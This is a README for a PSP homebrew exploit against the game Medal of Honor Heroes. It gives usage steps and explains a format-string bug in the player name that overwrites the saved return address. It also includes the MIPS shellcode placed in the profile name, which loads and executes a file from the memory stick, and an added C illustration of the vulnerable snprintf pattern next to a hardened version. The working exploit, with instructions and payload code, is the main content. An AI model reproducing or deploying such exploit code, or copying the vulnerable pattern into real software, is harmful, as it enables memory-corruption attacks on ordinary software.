MOHH (1) exploit by kgsws (second version)

What you need:
	- NON-CFW PSP
	- this archive ... but you have it, don't you?

How to do it:
	- back up your MOHH savegame (if any)
	- copy the entire ms0 folder to the memory stick root
	- run MOHH
	- do not change any setting
	- create an AdHoc game
	- suicide - try a rocket, that's fast ;)

Important:
	- do not change any setting! :)
	- this is not a savegame exploit; the savegame just holds all the data needed to get the name exploit working.
	- if there is something bad in my English, correct me :)

Some info about "src":
The folder "hx" holds the source code of the hx file (my intro + menu).
The folder "sdk" holds the source of the test file.
Why two folders?
The "hx" file is loaded to address 0x08DAF840; if you want to create your own program that runs directly after exploiting, use this folder. Maybe a HEN :)
The "test" file is loaded to 0x08E50000 by my menu program; if you want to create games, use this folder and let others choose the game in my menu.

Some info about exploit:
As in the first version, the player name is vulnerable to a format-string exploit.
You can't make the player name long enough directly, so the format-string exploit is the only way.
If you put exactly 530 characters in the name (expanded by the format string), the following characters overwrite the saved $ra register.
Note that the string is Unicode: if you want to put an exact address there, you must UTF-8-encode your address.
OK, the 530 characters apply only to the on-suicide exploit.
The exploit code is stored in the profile name; the new $ra points there + 4.
The exploit code just loads ms0:/hx.
It loads at most 18.3 MB (0x01250000 bytes, the size passed to sceIoRead below) to address 0x08DAF840 and executes it from there.
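
The bug described above is the classic format-string mistake: the player name ends up being used as the printf-style format instead of being passed as an argument, so a name that passes the UI length check can still expand to hundreds of bytes. As an added illustration (not code from this archive or from the game), here is the vulnerable pattern next to the hardened form and an input check; the buffer size, function names and length limit are assumed, not taken from MOHH.

```c
#include <stdio.h>
#include <string.h>

/* Assumed size of an on-screen message buffer; not MOHH's real value. */
#define MSG_MAX 64

/* Vulnerable pattern (illustration only, never call with untrusted input):
 * the player name itself is the format string. Directives such as "%x"
 * in the name consume stack slots and expand, so a name that passed the
 * UI's length check can still produce far more output bytes than were
 * typed, which is how the 530-character expansion reaches the saved $ra. */
int show_name_vulnerable(char *out, size_t out_len, const char *name)
{
    return snprintf(out, out_len, name);
}

/* Hardened form: a fixed format with the name as a "%s" argument.
 * A '%' in the name is now just a character and the output is bounded
 * by out_len. */
int show_name_safe(char *out, size_t out_len, const char *name)
{
    return snprintf(out, out_len, "Player: %s", name);
}

/* Validation at the point the name enters the program. Apply it to the
 * bytes that will actually be formatted (the text notes the name is
 * Unicode, so check the UTF-8 bytes, not the typed character count) and
 * to names loaded from a profile or savegame, not only to typed input.
 * Returns 1 if acceptable, 0 otherwise. */
int name_is_acceptable(const char *name, size_t max_len)
{
    size_t n = strlen(name);
    if (n == 0 || n > max_len)
        return 0;               /* empty or over the byte-length limit */
    if (strchr(name, '%') != NULL)
        return 0;               /* would be parsed as a format directive */
    return 1;
}
```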

Profile name code (addresses on execution = 0x08DAF840):
#addr 0x08DAF83C
#	kgsw
#addr 0x08DAF840
	lui	$a0, 0x08DB
#addr 0x08DAF844
	addi	$a0, $a0, -1932 # *path
#addr 0x08DAF848
	li	$a1, 0x0801 # flags (PSP_O_RDONLY | PSP_O_EXCL)
#addr 0x08DAF84C
	jal	0x08C92BE4 # sceIoOpen
#addr 0x08DAF850
	li	$a2, 0x0309 # mode
#addr 0x08DAF854
	lui	$a1, 0x08DB
#addr 0x08DAF858
	addi	$a1, $a1, -1932 # *ptr
#addr 0x08DAF85C
	lui	$a2, 0x0125 # size
#addr 0x08DAF860
	nop	# game put here '\0'
#addr 0x08DAF864
	jal	0x08C92B94 # sceIoRead
#addr 0x08DAF868
	andi	$a0, $v0, 0xFFFF # uid
#addr 0x08DAF86C
	jal	0x08C9299C # sceKernelDcacheWritebackInvalidateAll
#addr 0x08DAF870
	nop
#addr 0x08DAF874
#	ms0:
#	/hx

